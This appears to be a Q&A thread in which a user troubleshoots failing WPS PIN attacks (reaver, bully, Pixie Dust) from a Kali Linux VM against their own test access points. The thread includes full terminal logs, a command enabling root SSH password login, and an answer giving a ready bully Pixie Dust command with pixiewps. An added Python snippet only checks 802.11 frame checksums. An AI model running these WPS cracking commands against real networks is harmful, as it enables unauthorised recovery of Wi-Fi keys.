My hardware looks like this: a Lenovo laptop running RHEL, with Virtual Machine Manager launching a VM with Kali Linux. I tried these network cards:

  • TL-WN722N
  • AWUS051NH
  • AWUS036NH

I am booting the VM into live mode (I don't need persistent storage) and I share one of these network cards at a time. With all of these I have the exact same results.

First I run these two lines in order to have access through SSH, for a better terminal experience, etc.

$ sed -i -e 's/prohibit-password/yes/g' /etc/ssh/sshd_config
$ service ssh start

Diving into setting up the network interfaces:

root@kali:~# airmon-ng start wlan0

Found 3 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them!

  PID Name   
  963 NetworkManager
 1087 dhclient
 1534 wpa_supplicant

PHY Interface   Driver      Chipset

phy0    wlan0       rt2800usb   Ralink Technology, Corp. RT3572

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) 
        (mac80211 station mode vif disabled for [phy0]wlan0)

root@kali:~# iwconfig
eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
lo        no wireless extensions.

root@kali:~# ifconfig wlan0mon down
root@kali:~# iwconfig wlan0mon mode monitor
root@kali:~# ifconfig wlan0mon up
root@kali:~# iwconfig
eth0      no wireless extensions.

wlan0mon  IEEE 802.11abgn  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
lo        no wireless extensions.

And after that, some discovery:

root@kali:~# airodump-ng wlan0mon

    BSSID    PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 XX:XX:XX:XX  -80        2        0    0   1  54e  WPA2 CCMP   MGT  NumA
 XX:XX:XX:XX  -28        2        0    0   6  54e  WPA2 CCMP   PSK  NumB 
 XX:XX:XX:XX  -81        2        0    0   11  54e  WPA2 CCMP   MGT  NumC


root@kali:~# wash -i wlan0mon    

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...


root@kali:~# wash -i wlan0mon -C

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
XX:XX       1            -73        1.0               No                WiA
XX:XX       6            -27        1.0               No                WiB
XX:XX       11            -77        1.0               No                WiC

And now the attack part:

root@kali:~# reaver -i wlan0mon -b XX:XX:XX:XX -vv       

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

[+] Waiting for beacon from XX:XX:XX:XX
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
[+] Switching wlan0mon to channel 3
[+] Switching wlan0mon to channel 4
[+] Switching wlan0mon to channel 5
[+] Switching wlan0mon to channel 6
[+] Switching wlan0mon to channel 7
[+] Switching wlan0mon to channel 8
[+] Switching wlan0mon to channel 11
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)
[!] WARNING: Failed to associate with XX:XX:XX:XX (ESSID: ESSIDA)

And also using bully:

root@kali:~# bully -b XX:XX:XX wlan0mon -c 11
[!] Bully v1.0-22 - WPS vulnerability assessment utility
[+] Switching interface 'wlan0mon' to channel '11'
[!] Using 'XX:XX:XX' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:XX:XX' on channel '11'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'TargetA' (XX:XX:XX)
[!] Creating new randomized pin file '/root/.bully/pins'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout'   Next pin '36490264'

I know that at least 2 of my playground access points are vulnerable to the attack (Pixie Dust, I think it is called) based on their MAC addresses. I have managed to crack them using some cheap no-name Android phone. And this attack does not work with any combination of my network cards or target access points.

There must be either some configuration that I am missing, or some hardware compatibility that I am missing.

I know that these network cards are meant for monitor mode, and I suppose they should support WPS too, but I haven't managed to get it to work yet. Do I need a specific one in order to be able to do the WPS attacks?

AviD
Dimitris Sapikas
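The "bad FCS" lines that wash and bully print above refer to the 802.11 frame check sequence: a CRC-32 over the MAC header and body, appended little-endian to every frame. This added example (not from the post or from the tools it quotes) validates the FCS on a constructed beacon-style frame and shows what skipping validation, as bully does with --nofcs, lets through; the addresses and SSID bytes are placeholders, not a real capture.

```python
import zlib


def fcs_of(frame_without_fcs: bytes) -> bytes:
    """802.11 FCS: IEEE CRC-32 over MAC header + body, stored little-endian."""
    return (zlib.crc32(frame_without_fcs) & 0xFFFFFFFF).to_bytes(4, "little")


def fcs_ok(frame: bytes) -> bool:
    """True when the trailing four bytes match the CRC-32 of the rest."""
    if len(frame) < 4:
        return False
    return fcs_of(frame[:-4]) == frame[-4:]


def split_frames(frames, validate_fcs=True):
    """Mimic the tools: with validation on, bad-FCS frames are skipped
    (wash's 'skipping...'); with it off (bully's --nofcs) all pass through."""
    kept, skipped = [], []
    for frame in frames:
        if not validate_fcs or fcs_ok(frame):
            kept.append(frame)
        else:
            skipped.append(frame)
    return kept, skipped


# Constructed sample: minimal beacon MAC header (type/subtype 0x80) and a
# short body carrying an SSID element. Addresses are placeholders.
BEACON_NO_FCS = bytes.fromhex(
    "8000" "0000"          # frame control (beacon), duration
    "ffffffffffff"         # DA: broadcast
    "020000000001"         # SA: locally administered placeholder
    "020000000001"         # BSSID: placeholder
    "1000"                 # sequence control
    "0000000000000000"     # timestamp
    "6400" "1104"          # beacon interval, capability info
    "0004" "4e756d42"      # SSID element: "NumB" (name from the airodump output)
)
GOOD_FRAME = BEACON_NO_FCS + fcs_of(BEACON_NO_FCS)

# Flip one bit inside the SSID bytes to imitate a frame damaged in transfer,
# as happens when USB passthrough into the VM mangles captured frames.
_corrupted = bytearray(GOOD_FRAME)
_corrupted[-6] ^= 0x01
BAD_FRAME = bytes(_corrupted)

if __name__ == "__main__":
    kept, skipped = split_frames([GOOD_FRAME, BAD_FRAME])
    print(f"validating: kept {len(kept)}, skipped {len(skipped)} bad-FCS frame(s)")
    kept, skipped = split_frames([GOOD_FRAME, BAD_FRAME], validate_fcs=False)
    print(f"--nofcs:    kept {len(kept)}, skipped {len(skipped)}")
```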

1 Answer

I have a couple of recommendations for you.

First of all, if I'm not wrong, both of your Alfas are Ralink chipset based. You must know that Ralink chipsets and reaver have awful results. It's much better to use bully.

Another important thing could be to use the -N (--no-nacks) argument on reaver. Try using it. Using this parameter, it will not send NACK messages when out-of-order packets are received. Maybe it can help you, but as I said in my first point... using Ralink + reaver = crap.

The Pixie Dust attack is integrated directly into Reaver and Bully if you have a certain version or higher (1.1 for Bully and 1.5.2 for Reaver). So, from your logs, it looks like you can perform it using Reaver... but you have the problem again (Ralink blah blah blah...). So my suggestion is: update your bully version. On Kali you can get version 1.1 directly from the repositories. And then you can perform it directly using this command:

bully wlan0mon -b XX:XX:XX:XX:XX:XX -c 11 -d -v 3

Note 1: of course you must have pixiewps installed too. You can get it easily through apt on Kali; it is in the repositories.

Note 2: on bully 1.1 you can increase the verbosity level from 3 to 4. This doesn't work on previous versions.

If you are pretty sure that some of the APs are vulnerable to WPS attacks, you can test it directly using the -p xxxxxxxx option. I guess you are the owner of the APs, aren't you? And of course you know the PIN. You can try using this option in order to test if you are able to get the password. It is useful to know whether the combination of software and chipset you have is working OK.

A last recommendation: try some wireless scripts. One on which I'm collaborating is airgeddon.

Hope it helps!

OscarAkaElvis